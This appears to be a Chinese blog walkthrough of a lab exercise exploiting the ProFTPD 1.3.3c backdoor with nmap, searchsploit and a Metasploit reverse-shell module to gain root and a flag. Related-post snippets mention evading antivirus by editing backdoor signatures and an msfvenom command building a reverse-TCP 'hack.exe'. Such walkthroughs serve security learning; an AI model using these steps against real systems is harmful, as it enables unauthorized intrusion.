FTP服务后门利用

最新推荐文章于 2024-05-11 14:39:59 发布
最新推荐文章于 2024-05-11 14:39:59 发布
阅读量930 收藏 4
点赞数 2
文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39687353/article/details/124110887
版权

FTP服务后门利用

1.什么是 FTP?

是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。

FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114)

至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。

2.searchsploit 是什么?

顾名思义,它将搜索所有的漏洞和shellcode。它不会包含任何文件和谷歌黑客数据库的结果

earchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-DB二进制文件中找到。

操作

1.攻击机kali IP地址192.168.192.128 使用``nmap -sn -PE 192.168.192.1/24` 探测出靶机ip为192.168.192.129

在这里插入图片描述

2.详细探测靶机开放服务信息

nmap -sV 192.168.192.129

在这里插入图片描述

可以看到靶机开启了 21 ftp服务,版本号为 ProFTPD 1.3.3c 可以百度查找此版本存在的漏洞及利用方法

在这里插入图片描述

3.在kali上 使用 searchsploit 查看漏洞信息

翻译过来大概意思就是可执行后门受损源漏洞

 searchsploit   ProFTPD 1.3.3c     #查找漏洞信息

在这里插入图片描述

4.第二个漏洞利用 集成到了 metasploit 中 ,可以利用 metasploit进行更简单的操作

打开 metasploit framwork: msfconsole

搜索可以使用的模块:

search ProFTPD 1.3.3c                          #查找该漏洞可利用模块

在这里插入图片描述

5.使用模块use exploit/unix/ftp/proftpd_133c_backdoor 选择第三个荷载 use cmd/unix/reverse

在这里插入图片描述
在这里插入图片描述

6.show options查看还有那些选项需要设置,如图设置好剩余options

set lhost 192.168.192.128                    设置本机ip 就是攻击机IP地址

set rhosts 192.168.192.129                    设置靶机ip

在这里插入图片描述

7.设置好所有参数之后运行 run 发现攻击成功 然后查看当前 id 发现是root用户 就不需要提权了

在这里插入图片描述

8.老样子执行命令优化终端

python -c "import pty; pty.spawn('/bin/bash')"

9.进入root命令 获取flag

在这里插入图片描述

雨.果
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
作真正属于自己的后门程序
01-13
1 如何使非常规后门变成exe后门,方便我们使用,这里我们用来演示的后门程序是黑客之门1.0版本。 2 如何修改后门程序躲过杀毒软件(这里拿比较强悍的avp-来自俄罗斯的卡巴斯基 作为例子),这里使用的是修改特征码的方法。 3 使用常用的端口扫描软件扫描开放端口,以方便我们利用。 4 得到shell后,如何上传文件,这里我们采取在对方的shell下用ftp下载的方法实现上传后门程序。 5 连接后门以及后门的基本使用方法。
Vulnhub-FUNBOX: SCRIPTKIDDIE渗透
laoyanCZ的博客
11-30 1830
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。如果有不懂的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉靶机:本文靶机下载连接-戳我直接下载!👈由于这个这个漏洞利用成功之后,可以直接拿到root权限,所以就不涉及提权了,获取flag文件之后本靶机的渗透就结束咯PS:其实通过nmap的vuln脚本可以直接扫描出来,亲手把自己脸打了哈哈哈。
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1121
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击Kali: IP地址:192.168.9.7 靶机: I
pmon--printf显示分析
huguohu2006的专栏
04-25 738
转自 LeeWg:http://blogold.chinaunix.net/u3/94960/showart_2056380.html1: __init()函数的解释:    Pmon中有三类constructor函数,他们都是静态函数,此类函数都有一个共性就是受__attribute__((constructor))属性修饰,例如    Static void init_fs __P((void)) __attribute__((constructor))下面说明三类函数:        a:命令处理函数
CTF--8.FTP服务后门利用
woo233的博客
09-13 878
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
FTP渗透测试
weixin_30485291的博客
09-24 683
在这篇文章中,我们将学习如何在CentOS机器配置ProFTPD的服务。之后,我们将进行渗透测试,以评估FTP服务的安全性,那么我们也将学习漏洞的对策。 在CentOS Linux机器的安装和配置FTP服务 [1] ProFTPD的源代码库的ProFTPD的服务器(1.3.3a)旧版本的源代码下载,位于ftp://ftp.proftpd.org/distrib/source/proftpd-1...
kali-漏洞利用】(3.4)免杀Payload 生成工具(下):Veil后门使用、监听失败原因
08-06 1453
kali-漏洞利用】Veil后门使用、监听失败原因
kali后门php,kali获取持续性后门shell · 醉梦半醒’s Blog
weixin_34501374的博客
03-29 418
win7靶机:192.168.1.38kali:192.168.1.35上一篇讲到通过ms17_010获取了shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路:msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马将exe文件发送给靶机u...
kali linux对Metasploitable2漏洞利用ProFTPD爆力破解 笔记
边城浪子的博客
09-19 515
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/ 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap -sV -p2121 192...
Ftp服务器2.8(20090803)(绿色的极好完全免费FTP服务器)
01-29
FTPServer.dat Ftp服务用户列表序列化存储文件; FTPServer.ini Ftp服务配置信息存储文件; 预计3.0版本更新: 1.支持多个虚拟目录; 2.更好的程序外观; 3.支持使用WebService检测版本更新功能; ...
asp后门、asp木马大清理.txt
03-09
asp后门、asp木马大清理.txt 网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止fso,利用ntfs限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来...
代理服务器知识大全(chm)$$$$$$$$
02-26
利用终端服务访问网站 利用SA空密码制作跳板 简单制作跳板 在局域网里实现二次代理 SafeWeb的安全设置说明 提升unicode权限,安装代理跳板 如何让自己从Internet上消失 代理服务器在软件中的补充设置说明 ...
电脑代理服务器地址和端口号.docx
06-09
这些木马程序在入侵前是先通过某种手段在一台个人计算机中植入一个程序,打开某个(些)特定的端口,俗称"后门"(backDoor),使这台计算机变成一台开放性极高(用户拥有极高权限)的FTp服务器,然后从后门就可以...
后门的类型与kali生成后门如何实现,及如何使用
2301_77441874的博客
06-19 1313
小小的讲一下后门程序以及kali如何进行后门的生成以及调用。
Kali Linux渗透测试 137 后门工具--Backdoor-factory
kevinhanser
04-13 5841
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 patch通过替换 exe、dll、注册表等方法修复系统漏洞或问题的方法 bdf:向二进制文件中增加或者删除代码内容 某些受保护的二进制程序无法 patch 存在一定概率问价你会被 patch
渗透测试---FTP服务后门
tzyyyyyy的博客
11-03 669
利用FTP服务后门漏洞 通过使用Metasploit框架进行渗透测试 并且取得root最高权限
funbox11靶机(ProFTPD1.3.3c提权漏洞)
m0_66299232的博客
11-13 465
3.上面俩个利用点都失败 ,前面探测到21端口proftpd有版本号。3.按照格式输出命令,成功进去root,轻松拿下!攻击机系统:kali linux 2021.1。1.用smbmap登录smb服务,查找利用信息。1.自己谷歌下版本漏洞可以找到利用的脚本。4.保存到当前目录,查看下,没啥大用。2.执行后发现usage,给出执行格式。2.用wpscan暴力破解用户名密码。2.用gobuster进行目录扫描。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。ProFTPD1.3.3c提权漏洞
Ftp笑脸漏洞复现(后门漏洞)
qq_55857040的博客
12-13 5038
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
centos7.9系统安全加固
最新发布
eagle89的专栏
05-11 398
centos7.9系统安全加固
利用ftp服务器自动更新的原理
05-31
FTP服务器自动更新的原理通常是通过定时任务或者事件触发器来实现的。具体来说,可以使用脚本编写一个定时任务,定期检查本地目录和FTP服务器上的文件是否一致,如果不一致,则将本地文件上传到FTP服务器上进行更新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值